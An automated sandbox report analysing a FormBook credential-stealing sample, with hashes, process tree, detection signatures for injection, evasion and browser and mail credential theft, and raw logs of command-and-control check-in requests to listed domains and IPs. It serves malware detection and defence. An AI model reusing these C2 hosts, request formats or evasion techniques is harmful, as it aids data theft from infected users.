Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rQuotation.exe

Overview

General Information

Sample name:rQuotation.exe
Analysis ID:1579601
MD5:d5828dcadc44bcdb74450e5a47118e5e
SHA1:1a83aade8a8eca25a9d4e92323ca22dd9401c531
SHA256:86f08a9f25687299366871821a8b14e11a406a4b83ece1711355505ad4dc1866
Tags:exeuser-Porcupine
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • rQuotation.exe (PID: 7540 cmdline: "C:\Users\user\Desktop\rQuotation.exe" MD5: D5828DCADC44BCDB74450E5A47118E5E)
    • gAmAZOKQyy.exe (PID: 4588 cmdline: "C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • NETSTAT.EXE (PID: 7876 cmdline: "C:\Windows\SysWOW64\NETSTAT.EXE" MD5: 9DB170ED520A6DD57B5AC92EC537368A)
        • gAmAZOKQyy.exe (PID: 4960 cmdline: "C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 8036 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2022208730.0000000001520000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.3572173092.0000000002A50000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.3574569506.00000000054D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.3572399532.0000000002D40000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.rQuotation.exe.840000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T04:08:06.153570+010028554651A Network Trojan was detected192.168.2.44973652.223.13.4180TCP
              2024-12-23T04:08:31.455127+010028554651A Network Trojan was detected192.168.2.449772192.30.252.15480TCP
              2024-12-23T04:08:46.361069+010028554651A Network Trojan was detected192.168.2.449811209.74.79.4080TCP
              2024-12-23T04:09:01.789855+010028554651A Network Trojan was detected192.168.2.449850202.95.11.11080TCP
              2024-12-23T04:09:25.825097+010028554651A Network Trojan was detected192.168.2.449909199.59.243.22780TCP
              2024-12-23T04:09:41.161466+010028554651A Network Trojan was detected192.168.2.449948192.186.58.3180TCP
              2024-12-23T04:09:57.792650+010028554651A Network Trojan was detected192.168.2.449988103.106.67.11280TCP
              2024-12-23T04:10:13.179553+010028554651A Network Trojan was detected192.168.2.450030185.68.108.24380TCP
              2024-12-23T04:10:28.813593+010028554651A Network Trojan was detected192.168.2.45003452.223.13.4180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T04:08:23.474747+010028554641A Network Trojan was detected192.168.2.449754192.30.252.15480TCP
              2024-12-23T04:08:26.138223+010028554641A Network Trojan was detected192.168.2.449760192.30.252.15480TCP
              2024-12-23T04:08:28.793205+010028554641A Network Trojan was detected192.168.2.449766192.30.252.15480TCP
              2024-12-23T04:08:38.333889+010028554641A Network Trojan was detected192.168.2.449788209.74.79.4080TCP
              2024-12-23T04:08:41.037762+010028554641A Network Trojan was detected192.168.2.449797209.74.79.4080TCP
              2024-12-23T04:08:43.781516+010028554641A Network Trojan was detected192.168.2.449805209.74.79.4080TCP
              2024-12-23T04:08:53.588934+010028554641A Network Trojan was detected192.168.2.449827202.95.11.11080TCP
              2024-12-23T04:08:56.260635+010028554641A Network Trojan was detected192.168.2.449836202.95.11.11080TCP
              2024-12-23T04:08:58.932562+010028554641A Network Trojan was detected192.168.2.449842202.95.11.11080TCP
              2024-12-23T04:09:17.847715+010028554641A Network Trojan was detected192.168.2.449889199.59.243.22780TCP
              2024-12-23T04:09:20.511273+010028554641A Network Trojan was detected192.168.2.449897199.59.243.22780TCP
              2024-12-23T04:09:23.180910+010028554641A Network Trojan was detected192.168.2.449903199.59.243.22780TCP
              2024-12-23T04:09:33.057642+010028554641A Network Trojan was detected192.168.2.449928192.186.58.3180TCP
              2024-12-23T04:09:35.713860+010028554641A Network Trojan was detected192.168.2.449935192.186.58.3180TCP
              2024-12-23T04:09:38.370315+010028554641A Network Trojan was detected192.168.2.449942192.186.58.3180TCP
              2024-12-23T04:09:49.229653+010028554641A Network Trojan was detected192.168.2.449969103.106.67.11280TCP
              2024-12-23T04:09:51.885890+010028554641A Network Trojan was detected192.168.2.449974103.106.67.11280TCP
              2024-12-23T04:09:54.542108+010028554641A Network Trojan was detected192.168.2.449980103.106.67.11280TCP
              2024-12-23T04:10:05.153667+010028554641A Network Trojan was detected192.168.2.450007185.68.108.24380TCP
              2024-12-23T04:10:07.867470+010028554641A Network Trojan was detected192.168.2.450016185.68.108.24380TCP
              2024-12-23T04:10:10.523001+010028554641A Network Trojan was detected192.168.2.450024185.68.108.24380TCP
              2024-12-23T04:10:20.552836+010028554641A Network Trojan was detected192.168.2.45003152.223.13.4180TCP
              2024-12-23T04:10:23.216474+010028554641A Network Trojan was detected192.168.2.45003252.223.13.4180TCP
              2024-12-23T04:10:25.875769+010028554641A Network Trojan was detected192.168.2.45003352.223.13.4180TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: rQuotation.exeAvira: detected
              Multi AV Scanner detection for submitted file
              Source: rQuotation.exeReversingLabs: Detection: 71%
              Source: rQuotation.exeVirustotal: Detection: 79%Perma Link
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.rQuotation.exe.840000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2022208730.0000000001520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3572173092.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3574569506.00000000054D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3572399532.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3572338314.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3573072552.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2022713393.0000000001AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: rQuotation.exeJoe Sandbox ML: detected
              Source: rQuotation.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: rQuotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: netstat.pdbGCTL source: rQuotation.exe, 00000000.00000003.2021707048.000000000123D000.00000004.00000020.00020000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572470472.0000000001107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: netstat.pdb source: rQuotation.exe, 00000000.00000003.2021707048.000000000123D000.00000004.00000020.00020000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572470472.0000000001107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gAmAZOKQyy.exe, 00000004.00000000.1946445492.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp, gAmAZOKQyy.exe, 00000006.00000000.2087665206.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: rQuotation.exe, 00000000.00000003.1931437975.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000003.1929221288.000000000132C000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.000000000182E000.00000040.00001000.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573169632.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573169632.000000000346E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2021924278.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2023759213.0000000003120000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: rQuotation.exe, rQuotation.exe, 00000000.00000003.1931437975.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000003.1929221288.000000000132C000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.000000000182E000.00000040.00001000.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000002.3573169632.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573169632.000000000346E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2021924278.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2023759213.0000000003120000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A6CC20 FindFirstFileW,FindNextFileW,FindClose,5_2_02A6CC20
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then xor eax, eax5_2_02A59E20
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then mov ebx, 00000004h5_2_030704E8
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeCode function: 4x nop then pop edi6_2_0550398A
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeCode function: 4x nop then xor eax, eax6_2_05507840
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then mov ebx, 00000004h7_2_000001610DF724E8

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 52.223.13.41:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 192.30.252.154:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49811 -> 209.74.79.40:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 192.30.252.154:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49788 -> 209.74.79.40:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49797 -> 209.74.79.40:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49842 -> 202.95.11.110:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49827 -> 202.95.11.110:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49805 -> 209.74.79.40:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49772 -> 192.30.252.154:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49836 -> 202.95.11.110:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 192.30.252.154:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49850 -> 202.95.11.110:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49903 -> 199.59.243.227:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49909 -> 199.59.243.227:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49897 -> 199.59.243.227:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49948 -> 192.186.58.31:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49969 -> 103.106.67.112:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49988 -> 103.106.67.112:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49935 -> 192.186.58.31:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49928 -> 192.186.58.31:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49974 -> 103.106.67.112:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49980 -> 103.106.67.112:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 52.223.13.41:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50007 -> 185.68.108.243:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 52.223.13.41:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 185.68.108.243:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49889 -> 199.59.243.227:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 52.223.13.41:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49942 -> 192.186.58.31:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 52.223.13.41:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 185.68.108.243:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 185.68.108.243:80
              Performs DNS queries to domains with low reputation
              Source: DNS query: www.llmsforrobot.xyz
              Source: DNS query: www.llmsforrobot.xyz
              Source: DNS query: www.furrcali.xyz
              Uses netstat to query active network connections and open ports
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
              Source: Joe Sandbox ViewIP Address: 103.106.67.112 103.106.67.112
              Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
              Source: Joe Sandbox ViewASN Name: GITHUBUS GITHUBUS
              Source: Joe Sandbox ViewASN Name: VOYAGERNET-AS-APVoyagerInternetLtdNZ VOYAGERNET-AS-APVoyagerInternetLtdNZ
              Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
              Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /7hkm/?4v7=PTrvXdcgSMfdhotioq8pnUkjNlxy61myV8F0WPH7Z2Bq/45rtMPjYLxLqkAieyptPF2XeHF9OCzJ15KQyhm6FHL/8EngdtV8gwYC3BL3/d+rtru4um4WJso=&pRel=chN0 HTTP/1.1Host: www.techforcreators.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /033w/?4v7=kZ/YQzY58uTPDy1SllACl2sKF+E3DMV6CvFnNkvZwHFDq3DsFBZ82/i3KTvXvlfgnzlAmNdsBQySpwa+g3edi3aCFGjCcomWBBYIDruBe4sqSy428ijZjbg=&pRel=chN0 HTTP/1.1Host: www.llmsforrobot.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /sd58/?4v7=qfAN8teQqWHl0pB75/wJ4PX285H5E3s25CgjwOd4PKd8zFqJMRX78aaJW2P6tpRkk2pp9lWkT1iA/dTcpEbuyLhsAas7SiW6kXoDkzQ8RaPJjUuFvtCyEK8=&pRel=chN0 HTTP/1.1Host: www.yous.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /qiu4/?4v7=YBXJjFFON5DPMwFVWr+hwJljRIjxpgK+/QxKc43NeU4JKf8f+IoPZInAdaP+cGuotGfyq3307yGnLgei346rHNdmY6IWbN+gRmHxztRtQ7iWQPlqqkvpfgI=&pRel=chN0 HTTP/1.1Host: www.mirenzhibo.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /w4ic/?4v7=yS69adElfH9iGuX+6qGjDo1pzUaFwG2aAiZ0CSeLQ3WEURd5D9NqWLH4alYcst9SwKAkCKhjPGbctdXA/FIYLK0HEa0UfTU4rNsaCNMRH49YQwEuYtvnEXw=&pRel=chN0 HTTP/1.1Host: www.sob.ripAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /gkfy/?4v7=07qYlGdy+WbqOk0cXAw1tsG+BYjZolWoNNS4BkQ+NnlSijGpnUaEsXAiEpeyBCiqWtAN48ClO71D0ZdXiZHmAUTm7Ixf7FFoVzGex49KD8u42uAoUmpEbrc=&pRel=chN0 HTTP/1.1Host: www.aihuzhibo.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /3dtl/?4v7=WTzrGLrFoDOf3MfqMggnB2yODJjw2W6R3d7AI4DzdlPnCYzv+YsvzCma/KjEqV7kmJXwzvABskUepNotbm90GG8Ab8L4vbMqXlBd8atmujJl3TdcKhvlJPk=&pRel=chN0 HTTP/1.1Host: www.furrcali.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /45u5/?pRel=chN0&4v7=0TAGyGi/QqAief36fqQZkTt5+nwNOdjQfsW4ILLFJiz2YBVGcbvNqcBGTGc+pdHcbXHcTIwSr9BXUFYIju8DT0Mq2PAg2Di4D0yPeZ6V6HqzRoZnxJ6cd60= HTTP/1.1Host: www.accusolution.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /zsuo/?4v7=YAgg/ldayhOHmzfsjWLXvaG7J5REZu11MAD7iHXRrkYiTwNIRlKLNa8zNDpduzX56xW5NVkmDFlOQcyvict8ZBdH6DXl406L+zQHeArrLeiD5GII5G18dkg=&pRel=chN0 HTTP/1.1Host: www.seamarket.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficDNS traffic detected: DNS query: www.techforcreators.live
              Source: global trafficDNS traffic detected: DNS query: www.llmsforrobot.xyz
              Source: global trafficDNS traffic detected: DNS query: www.yous.website
              Source: global trafficDNS traffic detected: DNS query: www.mirenzhibo.net
              Source: global trafficDNS traffic detected: DNS query: www.amorinc.click
              Source: global trafficDNS traffic detected: DNS query: www.sob.rip
              Source: global trafficDNS traffic detected: DNS query: www.aihuzhibo.net
              Source: global trafficDNS traffic detected: DNS query: www.furrcali.xyz
              Source: global trafficDNS traffic detected: DNS query: www.accusolution.pro
              Source: global trafficDNS traffic detected: DNS query: www.seamarket.shop
              Source: unknownHTTP traffic detected: POST /033w/ HTTP/1.1Host: www.llmsforrobot.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflateOrigin: http://www.llmsforrobot.xyzReferer: http://www.llmsforrobot.xyz/033w/Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0Data Raw: 34 76 37 3d 70 62 58 34 54 48 5a 46 7a 2f 6e 66 48 58 74 72 35 56 6c 54 72 30 34 43 46 39 70 78 4e 63 49 46 42 76 56 35 54 45 79 4f 35 45 6c 70 79 52 37 49 44 6b 39 30 79 34 69 75 41 32 50 54 6b 58 76 61 34 46 78 6d 36 2f 42 44 47 44 43 6e 35 69 61 75 79 51 61 32 75 67 57 49 4a 30 44 42 57 74 61 70 46 44 6f 64 56 4b 54 64 57 2b 67 4b 4b 6c 4a 6f 2b 45 7a 6c 67 76 6f 41 47 52 70 73 5a 41 46 48 34 51 32 6f 70 64 67 48 38 6e 48 79 55 37 37 6c 58 70 38 46 37 38 47 32 47 65 36 69 70 34 48 6f 69 7a 41 6b 35 77 79 6d 4e 49 42 74 6f 6a 30 32 67 44 30 44 4c 56 68 77 36 4d 66 69 31 47 54 2b 68 77 3d 3d Data Ascii: 4v7=pbX4THZFz/nfHXtr5VlTr04CF9pxNcIFBvV5TEyO5ElpyR7IDk90y4iuA2PTkXva4Fxm6/BDGDCn5iauyQa2ugWIJ0DBWtapFDodVKTdW+gKKlJo+EzlgvoAGRpsZAFH4Q2opdgH8nHyU77lXp8F78G2Ge6ip4HoizAk5wymNIBtoj02gD0DLVhw6Mfi1GT+hw==
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cacheContent-Type: text/html; charset=utf-8Strict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 0Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:;connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 0d 0a 0d 0a 48 65 6c 6c 6f 20 66 75 74 75 72 65 20 47 69 74 48 75 62 62 65 72 21 20 49 20 62 65 74 20 79 6f 75 27 72 65 20 68 65 72 65 20 74 6f 20 72 65 6d 6f 76 65 20 74 68 6f 73 65 20 6e 61 73 74 79 20 69 6e 6c 69 6e 65 20 73 74 79 6c 65 73 2c 0d 0a 44 52 59 20 75 70 20 74 68 65 73 65 20 74 65 6d 70 6c 61 74 65 73 20 61 6e 64 20 6d 61 6b 65 20 27 65 6d 20 6e 69 63 65 20 61 6e 64 20 72 65 2d 75 73 61 62 6c 65 2c 20 72 69 67 68 74 3f 0d 0a 0d 0a 50 6c 65 61 73 65 2c 20 64 6f 6e 27 74 2e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 74 79 6c 65 67 75 69 64 65 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2e 30 0d 0a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 